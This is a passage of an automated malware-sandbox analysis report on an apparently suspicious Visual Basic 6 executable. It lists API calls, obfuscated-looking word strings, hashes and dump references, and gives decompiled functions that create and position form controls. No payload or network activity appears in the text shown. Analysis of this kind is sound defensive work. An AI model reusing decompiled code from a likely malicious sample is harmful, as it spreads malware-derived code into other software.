                                  0x0040fc75
                                  0x0040fc7a
                                  0x0040fc7a
                                  0x0040fc8c
                                  0x0040fc9b
                                  0x0040fca1
                                  0x0040fca3
                                  0x0040fcb0
                                  0x0040fcd2
                                  0x0040fcb2
                                  0x0040fcb2
                                  0x0040fcb7
                                  0x0040fcbc
                                  0x0040fcbf
                                  0x0040fcc5
                                  0x0040fcca
                                  0x0040fcca
                                  0x0040fce8
                                  0x0040fcee
                                  0x0040fcf5
                                  0x0040fcf6
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040EA92
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,?,?,004014F6), ref: 0040EAD3
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000014), ref: 0040EB35
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040277C,00000078), ref: 0040EB8E
                                  • __vbaFreeObj.MSVBVM60(00000000,?,0040277C,00000078), ref: 0040EBB0
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,000006F8,?,003FC073,?,?), ref: 0040EC7A
                                  • __vbaStrCopy.MSVBVM60(?,003FC073,?,?), ref: 0040EC9F
                                  • __vbaStrCopy.MSVBVM60(?,003FC073,?,?), ref: 0040ECAC
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,003FC073,?,?), ref: 0040ED20
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,000006FC), ref: 0040EDB9
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000700), ref: 0040EE5C
                                  • __vbaStrCopy.MSVBVM60 ref: 0040EF01
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000704), ref: 0040EF80
                                  • __vbaFreeStr.MSVBVM60(00000000,00401268,00402594,00000704), ref: 0040EFA9
                                  • __vbaStrCopy.MSVBVM60(00000000,00401268,00402594,00000704), ref: 0040EFB6
                                  • __vbaStrCopy.MSVBVM60(00000000,00401268,00402594,00000704), ref: 0040EFD6
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040F040
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000708), ref: 0040F078
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,0000070C), ref: 0040F129
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F17A
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F187
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000710), ref: 0040F1C9
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040F1E7
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,004014F6), ref: 0040F1F7
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F222
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,006B48D8,?,?,?,950D78B0,004C041C,002DF651,00006BA0,0000106F,?), ref: 0040F28B
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F2A5
                                  • __vbaStrCopy.MSVBVM60 ref: 0040F2B2
                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,Neapolitanernes9,Femaaret1,004BF5BE), ref: 0040F31D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000714,?,?,00006589,?,BREGNEMOS,?), ref: 0040F42C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000718,?,?,31A5AE00,0000278F,0061043C,8A7D0750,00005AFF,0000668F,?,00004691,0000592A), ref: 0040F54A
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,0000071C,?,?,000067DF,007C54D2,0080397E,00003CF0,004D1BA3,00007308,22E85140,00005B03,004186F1), ref: 0040F60D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000720,?,0080397E,85536C70,?,?,000067DF,007C54D2,0080397E,00003CF0,004D1BA3,00007308,22E85140), ref: 0040F67F
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000724,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F7CD
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000728,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F818
                                  • __vbaStrCopy.MSVBVM60(?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?,?,85536C70,31A5AE00,?,0080397E), ref: 0040F856
                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F89D
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE,000026CE,00001837,00161041,?,?,aG?), ref: 0040F8E3
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,0000072C,?,?,?,?,00161041,?,?,?,?,?,00006DA8), ref: 0040F99A
                                  • __vbaFreeStr.MSVBVM60(?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0,00005CE9,0065F8FE), ref: 0040F9BA
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000730,?,?,?,?,00161041,?,?,?,?,?,00006DA8), ref: 0040F9FD
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000734,?,005D86FE,?,?,?,?,00161041,?,?,?,?), ref: 0040FA8B
                                  • __vbaStrCopy.MSVBVM60(?,005D86FE,?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0), ref: 0040FAB0
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000738,?,005D86FE,?,?,?,?,00161041,?,?,?,?), ref: 0040FB0E
                                  • __vbaFreeStr.MSVBVM60(?,005D86FE,?,?,?,?,00161041,?,?,?,?,?,00006DA8,?,?,7DF0FFF0), ref: 0040FB25
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,0000073C,?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE,?,?,?), ref: 0040FBD1
                                  • __vbaStrCopy.MSVBVM60(?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE,?,?,?,?,00161041,?), ref: 0040FBED
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402594,00000740,?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB), ref: 0040FC75
                                  • __vbaFreeStr.MSVBVM60(?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB,000022AD,?,005D86FE), ref: 0040FC8C
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401268,00402564,000001BC,?,?,0000214D,?,?,?,00003B8B,?,FEDB0060,00005AF6,000064E5,00004ECB), ref: 0040FCC5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckHresult$Copy$Free$List$ChkstkNew2
                                  • String ID: *Y$<3A$ACROMIOCLAVICULAR$Attenuating$BREGNEMOS$COORDINATORY$Ciceronically$DI$Femaaret1$I.$Industrivirksomhed9$Korrekturrettet3$M!$MARMENNILL$Neapolitanernes9$Nonbrand$Outcut8$POSTMULTIPLIED$Princesslike2$Rapportopgaveer$STAMPNING$STRUKTURELLES$Stjernetaager$Tassets$UDSENDELSESLEDERENS$UNGDOMSFNGSELS$Unimputed7$Untheologize8$Yor9$aG?$brysthulernes$degenereringens$glimmeringly$mindedigtet$nonleaded$pentalogies$plasmodiate$G
                                  • API String ID: 2697884310-3846647724
                                  • Opcode ID: ee8cd8c45b874de75dd98f456106165adb2cfbc5c805668808eb7b1ec20fffbb
                                  • Instruction ID: 13a9ec771c4c9c4a3270586bd161919e83cd5da6f2ecccc63caf0762c533202e
                                  • Opcode Fuzzy Hash: ee8cd8c45b874de75dd98f456106165adb2cfbc5c805668808eb7b1ec20fffbb
                                  • Instruction Fuzzy Hash: 2FB2C571900219EFDB20DF50CD85BD9BBB9FF08304F0080EAF64DAA2A1DB755A998F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410C4D, Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 214COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 40%
                                  			E00410C4D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a44) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v40;
				void* _v44;
				void* _v52;
				signed int _v56;
				char _v72;
				signed int _v96;
				char _v104;
				char* _v128;
				intOrPtr _v136;
				signed int _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v176;
				signed int _v180;
				char _v184;
				signed int _v188;
				signed int _v192;
				signed int _t95;
				char* _t98;
				char* _t103;
				signed int _t104;
				char* _t105;
				signed int _t111;
				signed int _t117;
				void* _t144;
				intOrPtr _t146;

				 *[fs:0x0] = _t146;
				L004014F0();
				_v12 = _t146;
				_v8 = 0x401378;
				L004016A6();
				_v96 = L"VB.PictureBox";
				_v104 = 8;
				_v128 = L"brass";
				_v136 = 8;
				_t95 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v52, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t144);
				asm("fclex");
				_v156 = _t95;
				if(_v156 >= 0) {
					_v180 = _v180 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x402564);
					_push(_a4);
					_push(_v156);
					L004016B2();
					_v180 = _t95;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v52);
				_t98 =  &_v72;
				_push(_t98); // executed
				L004015E6(); // executed
				_push(_t98);
				L004015EC();
				_push(_t98);
				_push( &_v40);
				L00401610();
				L004016AC();
				L0040167C();
				_v96 = 0x6122;
				_v104 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v40);
				L004015E0();
				_v96 = 0x65c1;
				_v104 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v40);
				L004015E0();
				_v96 = _v96 | 0xffffffff;
				_v104 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v40);
				L004015E0();
				_v96 = _v96 | 0xffffffff;
				_v104 = 0x800b;
				_push(0);
				_push(L"Enabled");
				_push(_v40);
				_t103 =  &_v72;
				_push(_t103);
				L004015E6();
				_push(_t103);
				_t104 =  &_v104;
				_push(_t104);
				L00401688();
				_v156 = _t104;
				L0040167C();
				_t105 = _v156;
				if(_t105 != 0) {
					if( *0x41333c != 0) {
						_v184 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v184 = 0x41333c;
					}
					_t51 =  &_v184; // 0x41333c
					_v156 =  *((intOrPtr*)( *_t51));
					_t111 =  *((intOrPtr*)( *_v156 + 0x1c))(_v156,  &_v52);
					asm("fclex");
					_v160 = _t111;
					if(_v160 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40275c);
						_push(_v156);
						_push(_v160);
						L004016B2();
						_v188 = _t111;
					}
					_v164 = _v52;
					_v96 = 0x80020004;
					_v104 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t117 =  *((intOrPtr*)( *_v164 + 0x54))(_v164, 0x10,  &_v56);
					asm("fclex");
					_v168 = _t117;
					if(_v168 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x402c00);
						_push(_v164);
						_push(_v168);
						L004016B2();
						_v192 = _t117;
					}
					_v176 = _v56;
					_v56 = _v56 & 0x00000000;
					_push(_v176);
					_t105 =  &_v36;
					_push(_t105);
					L004015DA();
					L004016AC();
				}
				_push(0x410f7c);
				L0040167C();
				L004016AC();
				L0040169A();
				return _t105;
			}

































                                  0x00410c5e
                                  0x00410c6a
                                  0x00410c72
                                  0x00410c75
                                  0x00410c82
                                  0x00410c87
                                  0x00410c8e
                                  0x00410c95
                                  0x00410c9c
                                  0x00410cb2
                                  0x00410cb8
                                  0x00410cba
                                  0x00410cc7
                                  0x00410ce9
                                  0x00410cc9
                                  0x00410cc9
                                  0x00410cce
                                  0x00410cd3
                                  0x00410cd6
                                  0x00410cdc
                                  0x00410ce1
                                  0x00410ce1
                                  0x00410cf0
                                  0x00410cf3
                                  0x00410cfd
                                  0x00410cfe
                                  0x00410cff
                                  0x00410d00
                                  0x00410d01
                                  0x00410d04
                                  0x00410d11
                                  0x00410d12
                                  0x00410d13
                                  0x00410d14
                                  0x00410d15
                                  0x00410d17
                                  0x00410d1c
                                  0x00410d1f
                                  0x00410d22
                                  0x00410d23
                                  0x00410d2b
                                  0x00410d2c
                                  0x00410d31
                                  0x00410d35
                                  0x00410d36
                                  0x00410d3e
                                  0x00410d46
                                  0x00410d4b
                                  0x00410d52
                                  0x00410d59
                                  0x00410d5c
                                  0x00410d66
                                  0x00410d67
                                  0x00410d68
                                  0x00410d69
                                  0x00410d6a
                                  0x00410d6f
                                  0x00410d72
                                  0x00410d77
                                  0x00410d7e
                                  0x00410d85
                                  0x00410d88
                                  0x00410d92
                                  0x00410d93
                                  0x00410d94
                                  0x00410d95
                                  0x00410d96
                                  0x00410d9b
                                  0x00410d9e
                                  0x00410da3
                                  0x00410da7
                                  0x00410dae
                                  0x00410db1
                                  0x00410dbb
                                  0x00410dbc
                                  0x00410dbd
                                  0x00410dbe
                                  0x00410dbf
                                  0x00410dc4
                                  0x00410dc7
                                  0x00410dcc
                                  0x00410dd0
                                  0x00410dd7
                                  0x00410dd9
                                  0x00410dde
                                  0x00410de1
                                  0x00410de4
                                  0x00410de5
                                  0x00410ded
                                  0x00410dee
                                  0x00410df1
                                  0x00410df2
                                  0x00410df7
                                  0x00410e01
                                  0x00410e06
                                  0x00410e0f
                                  0x00410e1c
                                  0x00410e39
                                  0x00410e1e
                                  0x00410e1e
                                  0x00410e23
                                  0x00410e28
                                  0x00410e2d
                                  0x00410e2d
                                  0x00410e43
                                  0x00410e4b
                                  0x00410e63
                                  0x00410e66
                                  0x00410e68
                                  0x00410e75
                                  0x00410e97
                                  0x00410e77
                                  0x00410e77
                                  0x00410e79
                                  0x00410e7e
                                  0x00410e84
                                  0x00410e8a
                                  0x00410e8f
                                  0x00410e8f
                                  0x00410ea1
                                  0x00410ea7
                                  0x00410eae
                                  0x00410ebc
                                  0x00410ec6
                                  0x00410ec7
                                  0x00410ec8
                                  0x00410ec9
                                  0x00410ed8
                                  0x00410edb
                                  0x00410edd
                                  0x00410eea
                                  0x00410f0c
                                  0x00410eec
                                  0x00410eec
                                  0x00410eee
                                  0x00410ef3
                                  0x00410ef9
                                  0x00410eff
                                  0x00410f04
                                  0x00410f04
                                  0x00410f16
                                  0x00410f1c
                                  0x00410f20
                                  0x00410f26
                                  0x00410f29
                                  0x00410f2a
                                  0x00410f32
                                  0x00410f32
                                  0x00410f37
                                  0x00410f66
                                  0x00410f6e
                                  0x00410f76
                                  0x00410f7b

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410C6A
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410C82
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402564,00000218), ref: 00410CDC
                                  • __vbaChkstk.MSVBVM60(00000000,?,00402564,00000218), ref: 00410CF3
                                  • __vbaChkstk.MSVBVM60(00000000,?,00402564,00000218), ref: 00410D04
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00410D23
                                  • __vbaObjVar.MSVBVM60(00000000), ref: 00410D2C
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00410D36
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 00410D3E
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00410D46
                                  • __vbaChkstk.MSVBVM60 ref: 00410D5C
                                  • __vbaLateMemSt.MSVBVM60(?,Left), ref: 00410D72
                                  • __vbaChkstk.MSVBVM60(?,Left), ref: 00410D88
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left), ref: 00410D9E
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left), ref: 00410DB1
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left), ref: 00410DC7
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Enabled,00000000,?,Visible,?,Top,?,Left), ref: 00410DE5
                                  • __vbaVarTstNe.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 00410DF2
                                  • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 00410E01
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,00000000,?,?,00000000,00000000), ref: 00410E28
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000001C), ref: 00410E8A
                                  • __vbaChkstk.MSVBVM60(00000000), ref: 00410EBC
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000054), ref: 00410EFF
                                  • __vbaVarSetObj.MSVBVM60(?,?), ref: 00410F2A
                                  • __vbaFreeObj.MSVBVM60(?,?), ref: 00410F32
                                  • __vbaFreeVar.MSVBVM60(00410F7C,?,00000000,?,?,00000000,00000000), ref: 00410F66
                                  • __vbaFreeObj.MSVBVM60(00410F7C,?,00000000,?,?,00000000,00000000), ref: 00410F6E
                                  • __vbaFreeStr.MSVBVM60(00410F7C,?,00000000,?,?,00000000,00000000), ref: 00410F76
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$ChkstkFree$Late$CheckHresult$Call$AddrefCopyNew2
                                  • String ID: "a$<3A$Add$Enabled$Left$Top$VB.PictureBox$Visible$brass
                                  • API String ID: 3443568900-3680097262
                                  • Opcode ID: 2ce917335081252b38b74f1dc9e96aa155683dced3d0beeef9e98e7479b44354
                                  • Instruction ID: 72a85c204fbc0c4a6e2f059cbe6c19e2dbe5d59de289e69f9b94381ae2d083a8
                                  • Opcode Fuzzy Hash: 2ce917335081252b38b74f1dc9e96aa155683dced3d0beeef9e98e7479b44354
                                  • Instruction Fuzzy Hash: B2811C71D00318ABDF11EFA1CD46BCDB7B6AF05304F1044AAB5087B2E2CBB95A858F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041219C, Relevance: 52.7, APIs: 21, Strings: 9, Instructions: 151COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 31%
                                  			E0041219C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v36;
				char _v52;
				signed int _v76;
				char _v84;
				char* _v108;
				intOrPtr _v116;
				signed int _v136;
				signed int _v144;
				signed int _t56;
				char* _t59;
				char* _t65;
				signed int _t66;
				void* _t87;
				intOrPtr _t89;

				 *[fs:0x0] = _t89;
				L004014F0();
				_v12 = _t89;
				_v8 = 0x4014a8;
				_v76 = L"VB.CommandButton";
				_v84 = 8;
				_v108 = L"Fieldfight";
				_v116 = 8;
				_t56 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v36, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4014f6, __ecx, __ecx, _t87);
				asm("fclex");
				_v136 = _t56;
				if(_v136 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x402564);
					_push(_a4);
					_push(_v136);
					L004016B2();
					_v144 = _t56;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v36);
				_t59 =  &_v52;
				_push(_t59); // executed
				L004015E6(); // executed
				_push(_t59);
				L004015EC();
				_push(_t59);
				_push( &_v24);
				L00401610();
				L004016AC();
				L0040167C();
				_v76 = L"forswat";
				_v84 = 8;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Caption");
				_push(_v24);
				L004015E0();
				_v76 = 0x6ee8;
				_v84 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v24);
				L004015E0();
				_v76 = 0x4d4e;
				_v84 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v24);
				L004015E0();
				_v76 = _v76 | 0xffffffff;
				_v84 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v24);
				L004015E0();
				_v76 = _v76 & 0x00000000;
				_v84 = 0x8008;
				_push(0);
				_push(L"Caption");
				_push(_v24);
				_t65 =  &_v52;
				_push(_t65);
				L004015E6();
				_push(_t65);
				_t66 =  &_v84;
				_push(_t66);
				L0040165E();
				_v136 = _t66;
				L0040167C();
				asm("wait");
				_push(0x41239a);
				L004016AC();
				return _t66;
			}




















                                  0x004121ad
                                  0x004121b7
                                  0x004121bf
                                  0x004121c2
                                  0x004121c9
                                  0x004121d0
                                  0x004121d7
                                  0x004121de
                                  0x004121f1
                                  0x004121f7
                                  0x004121f9
                                  0x00412206
                                  0x00412228
                                  0x00412208
                                  0x00412208
                                  0x0041220d
                                  0x00412212
                                  0x00412215
                                  0x0041221b
                                  0x00412220
                                  0x00412220
                                  0x0041222f
                                  0x00412232
                                  0x0041223c
                                  0x0041223d
                                  0x0041223e
                                  0x0041223f
                                  0x00412240
                                  0x00412243
                                  0x0041224d
                                  0x0041224e
                                  0x0041224f
                                  0x00412250
                                  0x00412251
                                  0x00412253
                                  0x00412258
                                  0x0041225b
                                  0x0041225e
                                  0x0041225f
                                  0x00412267
                                  0x00412268
                                  0x0041226d
                                  0x00412271
                                  0x00412272
                                  0x0041227a
                                  0x00412282
                                  0x00412287
                                  0x0041228e
                                  0x00412295
                                  0x00412298
                                  0x004122a2
                                  0x004122a3
                                  0x004122a4
                                  0x004122a5
                                  0x004122a6
                                  0x004122ab
                                  0x004122ae
                                  0x004122b3
                                  0x004122ba
                                  0x004122c1
                                  0x004122c4
                                  0x004122ce
                                  0x004122cf
                                  0x004122d0
                                  0x004122d1
                                  0x004122d2
                                  0x004122d7
                                  0x004122da
                                  0x004122df
                                  0x004122e6
                                  0x004122ed
                                  0x004122f0
                                  0x004122fa
                                  0x004122fb
                                  0x004122fc
                                  0x004122fd
                                  0x004122fe
                                  0x00412303
                                  0x00412306
                                  0x0041230b
                                  0x0041230f
                                  0x00412316
                                  0x00412319
                                  0x00412323
                                  0x00412324
                                  0x00412325
                                  0x00412326
                                  0x00412327
                                  0x0041232c
                                  0x0041232f
                                  0x00412334
                                  0x00412338
                                  0x0041233f
                                  0x00412341
                                  0x00412346
                                  0x00412349
                                  0x0041234c
                                  0x0041234d
                                  0x00412355
                                  0x00412356
                                  0x00412359
                                  0x0041235a
                                  0x0041235f
                                  0x00412369
                                  0x0041236e
                                  0x0041236f
                                  0x00412394
                                  0x00412399

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004121B7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402564,00000218), ref: 0041221B
                                  • __vbaChkstk.MSVBVM60 ref: 00412232
                                  • __vbaChkstk.MSVBVM60 ref: 00412243
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 0041225F
                                  • __vbaObjVar.MSVBVM60(00000000), ref: 00412268
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000), ref: 00412272
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000), ref: 0041227A
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000), ref: 00412282
                                  • __vbaChkstk.MSVBVM60 ref: 00412298
                                  • __vbaLateMemSt.MSVBVM60(?,Caption), ref: 004122AE
                                  • __vbaChkstk.MSVBVM60(?,Caption), ref: 004122C4
                                  • __vbaLateMemSt.MSVBVM60(?,Left,?,Caption), ref: 004122DA
                                  • __vbaChkstk.MSVBVM60(?,Left,?,Caption), ref: 004122F0
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left,?,Caption), ref: 00412306
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left,?,Caption), ref: 00412319
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left,?,Caption), ref: 0041232F
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Caption,00000000,?,Visible,?,Top,?,Left,?,Caption), ref: 0041234D
                                  • __vbaVarTstEq.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 0041235A
                                  • __vbaFreeVar.MSVBVM60(?,00000000,?,?,00000000,00000000), ref: 00412369
                                  • __vbaFreeObj.MSVBVM60(0041239A,?,00000000,?,?,00000000,00000000), ref: 00412394
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Chkstk$Late$Free$Call$AddrefCheckHresult
                                  • String ID: Add$Caption$Fieldfight$Left$NM$Top$VB.CommandButton$Visible$forswat
                                  • API String ID: 4274921479-2698499078
                                  • Opcode ID: a77c5b72ccaa5bfd447fa77b4bdcaaeff56e455d0f8ab45f989c0af1c9f617f2
                                  • Instruction ID: d50404a59281fc2d8feee45e44be8fdf4a71157bb7bfd52c49d601b5ab05b4a1
                                  • Opcode Fuzzy Hash: a77c5b72ccaa5bfd447fa77b4bdcaaeff56e455d0f8ab45f989c0af1c9f617f2
                                  • Instruction Fuzzy Hash: 91514B71850618ABDF11EFA1CD4ABCEB7B6BF05708F10042AB500BF1E2CBFA65459B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004123B5, Relevance: 45.6, APIs: 20, Strings: 6, Instructions: 145COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E004123B5(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v48;
				signed int _v72;
				char _v80;
				char* _v104;
				intOrPtr _v112;
				signed int _v132;
				signed int _v144;
				signed int _t60;
				char* _t63;
				char* _t68;
				signed int _t69;
				signed int _t70;
				void* _t88;
				void* _t90;
				intOrPtr _t91;

				_t91 = _t90 - 0xc;
				 *[fs:0x0] = _t91;
				L004014F0();
				_v16 = _t91;
				_v12 = 0x4014b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x4014f6, _t88);
				_v72 = L"VB.VscrollBar";
				_v80 = 8;
				_v104 = L"Subvitalized";
				_v112 = 8;
				_t60 =  *((intOrPtr*)( *_a4 + 0x218))(_a4,  &_v32);
				asm("fclex");
				_v132 = _t60;
				if(_v132 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x218);
					_push(0x402564);
					_push(_a4);
					_push(_v132);
					L004016B2();
					_v144 = _t60;
				}
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(2);
				_push(L"Add");
				_push(_v32);
				_t63 =  &_v48;
				_push(_t63); // executed
				L004015E6(); // executed
				_push(_t63);
				L004015EC();
				_push(_t63);
				_push( &_v28);
				L00401610();
				L004016AC();
				L0040167C();
				_v72 = 0x5f1c;
				_v80 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Left");
				_push(_v28);
				L004015E0();
				_v72 = 0x2f97;
				_v80 = 2;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Top");
				_push(_v28);
				L004015E0();
